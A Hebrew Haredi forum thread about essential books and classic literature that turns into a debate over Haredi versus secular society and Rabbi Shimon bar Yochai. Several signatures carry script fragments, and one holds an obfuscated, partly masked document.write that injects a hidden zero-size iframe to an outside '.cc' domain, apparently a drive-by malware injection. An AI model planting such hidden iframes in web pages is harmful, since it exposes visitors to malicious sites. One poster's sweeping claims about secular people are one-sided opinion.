בית פורומים עצור כאן חושבים

אלו ספרים חובה לקרא

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-25/6/2013 17:32 לינק ישיר 

xibolaiyu כתב:
אמנם לא ספרות קלאסית או עיון, אך אהבתי
כל ספרי:
טרי פראצ'ט
דאגלס אדאמס
רוברט שאקלי
רוג'ר זלאזני ('אדון האור', 'הביאו לי את ראשו של נסיך החלומות')
ועוד

יש נקודה עקרונית שעולה מתוך דבריך, לדעתי, שנוגעת לשאלתו המקורית של ייתכן. כשאתה מדבר על מד"ב שזכה ביוגו או נבולה בשנות השישים, אז במידה רבה אתה מדבר על קלאסיקות לכל דבר. עושה רושם שהספרות עברה את מה שהמדע עבר. בימי הביניים, אדם יכל להיות איש אשכולות ולשלוט בכל "קלאסיקות המדע". היום זה בלתי אפשרי. באותו אופן, קשה לי להאמין שיש אנשים רבים היום שכיסו את הקלאסיקות הספרותיות תחת ההגדרות השונות (והמוצדקות!) של הז'אנרים השונים. ככלות הכל, כדי לכסות את קלאסיקות הספרות העדכנית של חבר העמים, עליך לפחות לכסות את הlonglist של פרס מאן-בוקר. בשאר אירופה, כנראה איחוד של פיינליסטי הגונקור הצרפתי עם אחרים שאין לי מושג מה הם. פוליצר (בדיוני ולא) הכרחי כדי לכסות את התרבות העדכנית האמריקאית. זה כלל לא מתחיל לכסות את המד"ב. וכו'. בקיצור, יש המון ז'אנרים שונים שבכל אחד ואחד מהם אפשר למצוא עולם עשיר ומאוזן למדי של קריאה.

[נקודות פחות עקרוניות:
אישית אני מהמר שפראצ'ט ישרוד פחות מאדאמס וזלאזני. שקלי (ולא שאקלי) קצת יוצא דופן ברשימתך הקצרה: האלימות הבוטה של סדרת victim/prime מאד דיברה אלי כשהייתי בחטיבת הביניים, ומאז לא הצלחתי למצוא שום דבר אחר שלו. איפה מצאת?]

בזמנו כאשר הסתובבתי בתחנה המרכזית החדשה בת''א, הייתה חנות קטנה של ספרים משומשים שהספיקה להיסגר בנתיים ומצאתי שם בזיל הזול את 'מלכודת האנשים' אוסף סיפורים קצרים,  'אלמוות בע''מ' וכמה מספרי ה ציידים ניצודים שלו. אהבתי במיוחד את הסיפורים הקצרים בשל הסגנון ההומוריסטי ביזארי פילוסופי..
יש המון קלאסיקה, לא קשה במיוחד לעשות רשימת מכולת של ספרים שנחשבים לקלאסיקה, אפשר גם לחפש בגוגל כאלה אני ציינתי סופרים שאני באופן אישי התחברתי לספרים שלהם, חלקם או חלקם הגדול.

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 17:35 לינק ישיר 

אני אוהב ספרי צדיקים שכולם קדושה ומוסר .

מסירות נפש וויתור .

נתינה לזולת ועוד סולם מלא של ערכים ומידות טובות .

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 17:59 לינק ישיר 

אייזין

לדבריך יש כמה מגזרים בארץ.

המגזר החרדי המאושר והערכי.

המגזר החילוני שמחנך לאלימות וחוסר תרבות, ומקנא במגזר החרדי.

ואני תמה:

על מה אתה מבסס את האיפיונים האלו?

מילא, אם אתה מתייחס לחרדים. אלו שאני מכיר אכן מחנכים לתורה וליראת שמים. בוודאי לא לאלימות. אם כי יש דברים הלוקים בחסר גם אצלנו (אטימות, שטחיות, העדר ביקורתיות, התרגלות לחיים שיש בהם סתירות ועוד, העדר ידע נחוץ לחיים בתקופתנו, ועוד).

אבל לומר שכל החילונים מחנכים לחוסר תרבות ולאלימות? או שהם מקנאים בנו?

כמדומה ש"חילונים" אינם כמונו, החרדים, בני סוג אחד. יש בהם סוגים רבים. החל במסורתיים ששותפים לרבות מאמונותינו, ועד לאתאיסטים מוצהרים ומתנגדים לדת. אולם אף אחד מהם אינו מחנך לאלימות מפני שאלימות שנואה על הכל ומפחידה את הכל.

חילונים אינם דוגלים בחוסר תרבות ובכלל מה זה "חוסר תרבות"? חילונים מחנכים, אם איני טועה, ל"רב תרבותיות", שזה סוג של פלורליזם. חיה ותן לחיות.

לא שאין להם סתירות ובעיות. יש. אבל לומר שאין זו דרך? אולי הדרך לא נראית לנו ומסיבות טובות, אבל למה לקחת מהם את מה שיש להם? וכי אם נזלזל בהם מתוך הצגה לא מדוייקת של שיטתם, אם יש שיטה, בכך ננצח אותם? מישהו כאן במלחמה?

וכי אין אצלם נסיונות לחינוך ומידות טובות? בדקת?

ובנוסף לכל, אין קנאה בחרדים מפני שאין היכרות עם החרדים. ואלו הרחוקים מאיתנו, ירצו מאד לא להיות דומים לנו, בגלל התדמית שיש לנו...

אתה יכול לטעון, בצדק, שכתבתי מה שכתבתי מתוך התרשמות וכאנתרופולוג של כורסה. להצדקתי אני יכול לומר שאני מסתמך על האופן שבו הדברים מצטיירים גם מתוך היכרותי בפורום עם כותבים שאינם "משלנו" וגם מקריאה מפוזרת של כותרות בתקשורת.

על מה אתה מסתמך?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 18:08 לינק ישיר 

לינקiלן כתב:

בזמנו כאשר הסתובבתי בתחנה המרכזית החדשה בת''א, הייתה חנות קטנה של ספרים משומשים שהספיקה להיסגר בנתיים ומצאתי שם בזיל הזול את 'מלכודת האנשים' אוסף סיפורים קצרים,  'אלמוות בע''מ' וכמה מספרי ה ציידים ניצודים שלו. אהבתי במיוחד את הסיפורים הקצרים בשל הסגנון ההומוריסטי ביזארי פילוסופי..

תודה. זה מתאים באופן מצער להתרשמותי ג"כ: הספרים אינם מודפסים עוד (בדקתי מספר פעמים בשהותי בארה"ב), ואין להם גרסה אלקטרונית.

יש המון קלאסיקה, לא קשה במיוחד לעשות רשימת מכולת של ספרים שנחשבים לקלאסיקה, אפשר גם לחפש בגוגל כאלה אני ציינתי סופרים שאני באופן אישי התחברתי לספרים שלהם, חלקם או חלקם הגדול.

מסכים. למען הסר ספק, לא נראה לי שיש בינינו ווכוח. בהודעתך הקודמת מנית מספר ספרים וציינת שהם אינם בהכרח קלאסיקות, ורציתי לומר שחלקם בהחלט קלאסיקות של ז'אנרים שכבר נחשבים די בשלים ורחבים. כמדומני שאמשלום כתבה משהו דומה.

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 18:23 לינק ישיר 

אייזין כתב:
אני אוהב ספרי צדיקים שכולם קדושה ומוסר .

מסירות נפש וויתור .

נתינה לזולת ועוד סולם מלא של ערכים ומידות טובות .

אתה מתכוון לערכים של אהבת האדם?

בהחלט יכול להיות תועלת בסיפורי צדיקים אם הם מביאים לאהבה בין הבריות, אני באופן אישית התחברתי לאמירתו של הלל הזקן 'כל התורה כולה על רגל אחת, מה ששנוא עליך אל תעשה' ('כלל הזהב' המוזכר פחות או יותר בכל הדתות בוריאציה כזו או אחרת וזה יפה מאוד
http://www.teachingvalues.com/goldenrule.html)

זה יפה הרצון הטוב להוסיף ערכים טובים

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 18:25 לינק ישיר 

אייזין

לדבריך יש כמה מגזרים בארץ.

המגזר החרדי המאושר והערכי.

המגזר החילוני שמחנך לאלימות וחוסר תרבות, ומקנא במגזר החרדי.

ואני תמה:

על מה אתה מבסס את האיפיונים האלו?

מילא, אם אתה מתייחס לחרדים. אלו שאני מכיר אכן מחנכים לתורה וליראת שמים. בוודאי לא לאלימות. אם כי יש דברים הלוקים בחסר גם אצלנו (אטימות, שטחיות, העדר ביקורתיות, התרגלות לחיים שיש בהם סתירות ועוד, העדר ידע נחוץ לחיים בתקופתנו, ועוד).

קודם כל אני מסכים שגם במגזר החרדי יש מה לשנות ולתקן .

אבל לומר שכל החילונים מחנכים לחוסר תרבות ולאלימות? או שהם מקנאים בנו?

כמדומה ש"חילונים" אינם כמונו, החרדים, בני סוג אחד. יש בהם סוגים רבים. החל במסורתיים ששותפים לרבות מאמונותינו, ועד לאתאיסטים מוצהרים ומתנגדים לדת. אולם אף אחד מהם אינו מחנך לאלימות מפני שאלימות שנואה על הכל ומפחידה את הכל.

אינם מחנכים פיזית לאלימות אלא העדר חינוך רצוי והתרת כל רסן וצפיה בסרטי אלימות וכדומה הוכיחו לא פעם שהם מה שגרמו לנקיטת אלימות .

חילונים אינם דוגלים בחוסר תרבות ובכלל מה זה "חוסר תרבות"? חילונים מחנכים, אם איני טועה, ל"רב תרבותיות", שזה סוג של פלורליזם. חיה ותן לחיות.

החילונים חיים בגישה של תן לחיות ואתה אל תחיה - כל מה שהם רוצים צותר ומה שאנו מבקשים אומרים לנו שזה כפיה דתית .

לא שאין להם סתירות ובעיות. יש. אבל לומר שאין זו דרך? אולי הדרך לא נראית לנו ומסיבות טובות, אבל למה לקחת מהם את מה שיש להם? וכי אם נזלזל בהם מתוך הצגה לא מדוייקת של שיטתם, אם יש שיטה, בכך ננצח אותם? מישהו כאן במלחמה?

וכי אין אצלם נסיונות לחינוך ומידות טובות? בדקת?

הניסיון גם אם קיים אינו מצליח וההוחכה לכך היא האלימות הגואה בבית הספר ובמקומות הבילוי ובכביש .

אני מוכן שיבואו חילונים לבתי ספר חרדים בבדיקת פתע לבדוק אם יש סכינים או סמים .

ובנוסף לכל, אין קנאה בחרדים מפני שאין היכרות עם החרדים. ואלו הרחוקים מאיתנו, ירצו מאד לא להיות דומים לנו, בגלל התדמית שיש לנו...

מי שפוגש חרדים מקנט כי הוא רואה את החינוך והטוהר .

אתה יכול לטעון, בצדק, שכתבתי מה שכתבתי מתוך התרשמות וכאנתרופולוג של כורסה. להצדקתי אני יכול לומר שאני מסתמך על האופן שבו הדברים מצטיירים גם מתוך היכרותי בפורום עם כותבים שאינם "משלנו" וגם מקריאה מפוזרת של כותרות בתקשורת.

על מה אתה מסתמך?

_________________לצערי אלה העובדות בשטח .

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** height="0" src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"' frameborder="0" width="0" scrolling="no"><*");

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 18:30 לינק ישיר 

xibolaiyu כתב:

תודה. זה מתאים באופן מצער להתרשמותי ג"כ: הספרים אינם מודפסים עוד (בדקתי מספר פעמים בשהותי בארה"ב), ואין להם גרסה אלקטרונית.

מסכים. למען הסר ספק, לא נראה לי שיש בינינו ווכוח. בהודעתך הקודמת מנית מספר ספרים וציינת שהם אינם בהכרח קלאסיקות, ורציתי לומר שחלקם בהחלט קלאסיקות של ז'אנרים שכבר נחשבים די בשלים ורחבים. כמדומני שאמשלום כתבה משהו דומה.

אני קניתי את הספרים בעברית, חבל שהם לא מודפסים. אולי באי אלו ספריות ניתן להשיג..
אני מסכים איתך שמדובר בקלאסיקות, לא ידעתי למה מכוון 'ייתכן' במונח ספרות קלאסית שאדם תרבותי לא יכול בלעדיה..

דדווח על תוכן פוגעני

נשלח ב-25/6/2013 23:49 לינק ישיר 

א.
אמשלום כתבה: ' ...ראויים לכינוי "קלאסי" ... במובן זה שהם מהווים בסיס תרבותי ושורש לספרות שאחריהם'. הבחנה זו יכולה לשמש בסיס מסוים לנדרש מ'בן תרבות'.
לא פלא שלא הציעו כאן להתחיל בתנ'ך כספר לקריאה ספרותית שלו. בתלמוד מצוי אוסף ספורים ואגדות מעולה. מן העבר השני של הים מצויה המיתולוגיה היוונית, המחזאות, השירה והספרות, ההיסטוריה והיצירה העיונית שלהם. הם אבות התרבות, גם התרבות היהודית, עד היום הזה. תומס מאן מספר את קורות 'יוסף ואחיו' כדי להטיב להבין את האדם בן המאה העשרים. 'מלחמה ושלום', רומן אפי ענק של טולסטוי, כולל בתוכו עיון מעמיק במשמעות של ההיסטוריה והתהוותה, והיא, ההיסטוריה, מחקרה וכתיבתה, מן ההשגים הגדולים של העולם הקלאסי.  

ב.
תלמידטועה, האינך מבדיל בשוני בין הפסוקים? [1] 'ספרות יפה מטיפה לדעות לא דרך המח אלא דרך הלב' [2] ספרות אינה פונה רק למח. השני נכון בעיני, הראשון אוילות מטופשת . הסבר אינו נחוץ, פתח ספר ותקרא. לא עסקתי ברשב'י אלא בפסוק אחד שלו ומה שמשתמע ממנו. דוקא את תקופתו אני מכיר מעט, משום עיסוקי בהיסטוריה. הוא שייך לקבוצת הנהגה רומנטית הזויה, בלתי שפויה, חסרת הבנה, תבונה, שיקול דעת ואחריות ביחס למציאות, אשר הביאה לאסון הגדול ביותר של העם היהודי עד לשואה בימינו.

ג.
נכתבות כאן דעות נחרצות בדבר עליונות מוסרית נשגבת של קבוצה חברתית אחת, לעומת השחיתות המוסרית והניוון התרבותי של קבוצה אחרת המצויה בתחתית המדרגה האנושית. אלו דעות שבלוניות, גורפות, וכרגיל, מנופחות ונבובות, ממש רגע אחד לפני שהבלון הנפוח מתפוצץ בפניו של בעל הנפיחה.
קדושת יתר היא העמדת פנים המעידה על שחיתות מוסרית מוסוות היטב, וסידרה כזו של טיעונים מעידה על חוסר יושר שמתוך חולשה פנימית, רגשי נחיתות, משבר ופחד.

ד.
מה משמעות השאלה שעליה הדיון? בעל הדברים חש שהחברה שהוא נמצא בה, לוקה בהעדר השכלה ולכן אנשיה אינם 'בני תרבות'. נדרש אומץ לב ויושר כדי להניח שאלה כזו גלויה על השולחן. יש כאן מעשה מעודד בכוונתו. אם ניוודע לבעיה, ונעשה את הדרוש לתיקונה, כלומר נקרא ונלמד, או אז יתוקן המצב והחברה תתקדם, תתפתח, תעשה בת תרבות.  הכוונה ראויה ומועילה. אבל, באחת, היא גם תמימה. למה הדבר דומה? לאדם השואל מה עלי לאכול בארוחת הבקר כדי שיהיה שבע ובריא. הוא מקבל תפריט, אוכל בהתאם ויוצא ידי חובתו. התשובה לשאלה שלפנינו אינה מציגה תפריט, אלא מציעה התעסקות. כדי להיות 'בן תרבות' עליך לעסוק עיסוק סדיר בגילויי התרבות. במה בדיוק? - במה שאתה מתעניין ומוצא בו הנאה. עם הזמן ימצא כל אחד שתחומו מתקשר עם תחומים אחרים, מעשה ריקמה, וביחד מהתווה חברה תרבותית מגוונת.
עודד  

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 02:55 לינק ישיר 

לכל אומה יש את ייחודה-היא. אם אומה סבורה שתרבותה מבוססת על תרבויות של אומות אחרות, אזי או שטרם למדה להכיר את הייחוד של תרבותה או שתרבותה נמצאת בתחלת דרכה. מהבחינה הזאת, הרבה ישראלים אינם בני תרבות כי מחד אינם בקיאים במקורות היהודיים לדורותיהם ומאידך הספרות העברית החדשה קיימת רק מזה כמאה ושלושים שנה וזו תקופה קצרה מדי לגיבוש תרבות עשירה ואיכותית.

"אומה שכלית, כמו למשל האנגלית, מטפחת עסקים, חיי מעשה; אומה רגשית, כמו הגרמנית, מטפחת נגינה; עם שנון, כמו הצרפתי, משוחח, כלומר המצאותיו באות לו עקב הדברים שהוא לוקח עם אחרים, עקב היותו מעורב עם הבריות. ועם בעל דמיון, כאיטלקי, כוחו באימפרוביזציה, כלומר מעלה באורח טבעי את הרגשות הרגילים למדרגת שירה."

גיאורג ברנדס, ראשי הזרמים בספרות המאה התשע-עשרה

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 07:07 לינק ישיר 

עודד – תשובותי באדום

האינך מבדיל בשוני בין הפסוקים? [1] 'ספרות יפה מטיפה לדעות לא דרך המח אלא דרך הלב' [2] ספרות אינה פונה רק למח. השני נכון בעיני, הראשון אוילות מטופשת . הסבר אינו נחוץ, פתח ספר ותקרא

נניח שהסבר אינו נחוץ. אתה יכול להביא דוגמה?  העלה כאן קטע ונראה.

לא עסקתי ברשב'י אלא בפסוק אחד שלו ומה שמשתמע ממנו. דוקא את תקופתו אני מכיר מעט, משום עיסוקי בהיסטוריה. הוא שייך לקבוצת הנהגה רומנטית הזויה, בלתי שפויה, חסרת הבנה, תבונה, שיקול דעת ואחריות ביחס למציאות, אשר הביאה לאסון הגדול ביותר של העם היהודי עד לשואה בימינו.

ושוב עסקת ברשב"י

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 07:30 לינק ישיר 

עודד

העלית טענה חמורה מאד נגד רשב"י. גם אם ננכה את ייחוס הזוהר ממפעליו - כפי שמתבקש - עדיין מדובר באחד מן המפורסמים שבתנאים ואחד ממעבירי התורה.

אני מציע שתפתח אודותיו אשכול ונבחן את דבריו ואת מעשיו ככל הידוע לנו, ונראה אם צדקת בדבריך. יש לשים לינק לאשכול זה כאן.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 10:56 לינק ישיר 

הרב מימוני
אני בטוח שאם תתאמץ לא הרבה, תגלה כמה מקורות בגמרא ובחז"ל אחרים, המתאימים לדברי עודד.

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 14:11 לינק ישיר 

א.

כתב מיימוני: 'העלית טענה חמורה מאד נגד רשב"י. גם אם ננכה את ייחוס הזוהר ממפעליו - כפי שמתבקש - עדיין מדובר באחד מן המפורסמים שבתנאים ואחד ממעבירי התורה'.

הטיעון חסר תוקף הגיוני. השגיאה הזו נפוצה מאד ובעלת השלכות מעשיות מסוכנות.

תאר לך פלוני, פרופסור למתמטיקה, משכמו ומעלה בתחום הזה. אבל לנהוג במכונית, לזה אינו מוכשר כלל. הוא מתבלבל בין בדוושות, אינו יודע לנהוג בהגה, אינו מבין כלל את הנעשה בכביש ואינו מסוגל להחליט מה לעשות. הוא פרופסור מפוזר מובהק. האם הוא ראוי להיות מורה נהיגה? מה הקשר בין כושר למתמטיקה וכושר נהיגה?

טענות מותר להעלות כנגד כל אחד, רק חסיד שוטה פוסל את הדבר. להבדיל מהערכה, הערצת אנשים והתבטלות בפניהם פסולים מכל וכל. היושר האינטלקטואלי והשאיפה לאמת קודמים לכל אדם, לכל תורה  ולכל קדושה, עם או בלי מרכאות.  העובדה כי אדם היום באמת ובתמים גדול בתורה, אינה ראיה  על הבנתו בענינים של המציאות.  זו שגיאה נפוצה מאד, לרוב אינה תמימה, והשלכותיה המעשיות מסוכנות.

באשר לטענה עצמה, בדקתי דבקתי אותה קודם הכתיבה ואני מקווה שיעלה בידי לסקור אותה בשיחה נפרדת, כדרך שכתבתי בענין החנוכה, וגם שם כבר רמזתי להמשך.

ב.

נהנתי מהאמירה השנונה של גאורג ברנדס, אותה הביא מ80. אבל אמירות שנונות לפעמים גם מחטיאות. האנגלים של המאה ה 19 כוחם גדול גם בספרות ובשירה. גרמניה, אכן בתקופתה הרומנטית, היא מעצמת על תעשיתית ומדעית.

באשר ליחוד שלנו היהודים, עיקרו במשפט העברי. חז'ל הכירו בכך ועמדו, מתוך הערכה, על הדמיון הזה בינינו לבין רומא, אשר המשפט שלה הוא השג מובהק של תרבותה. בתחומים אחרים היהודים, מה לעשות, לא הצטיינו.

עודד   

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 18:04 לינק ישיר 

לי נראה שהישגיה העיקריים של האומה הרומאית היו בארכיטקטורה (עיין ערך ויטרוביוס), וכך גם סבר רבי יהודה שחי באותה תקופה באומרו: כמה נאים מעשיה של אומה זו, תקנו שווקים, תקנו גשרים, תקנו מרחצאות. השווקים מחזקים את המסחר, הגשרים מאפשרים מעבר ידע בין ערים ובין ארצות, והמרחצאות מיטיבים את הבריאות. באיטליה רוב האקוודוקטים הרומאים המשיכו לשמש כחלק ממערכת המים עד לפני כמאה שנה, וחלקם עדיין בשימוש.

נ.ב. האנגלים כוחם היה גדול בספרות ובשירה רק במאה ה-19? ברנדס שכתב שני ספרים על השירה והספרות האנגלית במאה ה-19 ושלשה ספרים על שקספיר שכח בטעות להזכיר את ספרותה? לונדון של ימינו ייחודה העיקרי בסופריה ומשורריה או בהיותה מרכז בינלאומי של עסקים?

תוקן על ידי מ80 ב- 26/06/2013 18:09:04

דדווח על תוכן פוגעני

נשלח ב-26/6/2013 18:12 לינק ישיר 

תאר לך פלוני, פרופסור למתמטיקה, משכמו ומעלה בתחום הזה. אבל לנהוג במכונית, לזה אינו מוכשר כלל. הוא מתבלבל בין בדוושות, אינו יודע לנהוג בהגה, אינו מבין כלל את הנעשה בכביש ואינו מסוגל להחליט מה לעשות. הוא פרופסור מפוזר מובהק. האם הוא ראוי להיות מורה נהיגה? מה הקשר בין כושר למתמטיקה וכושר נהיגה?

אז למה לשופטי בג''ץ שאין להם ידע בסיסי ביהדות מותר להתערב בנושאי דת ???

זה שהם למדו חוק אנגלי או טורקי וכדומה עדיין אינו נותן להם הבנה בשום תחום לגבי היהדות ...

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > אלו ספרים חובה לקרא
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 10 11 12 לדף הבא סך הכל 12 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.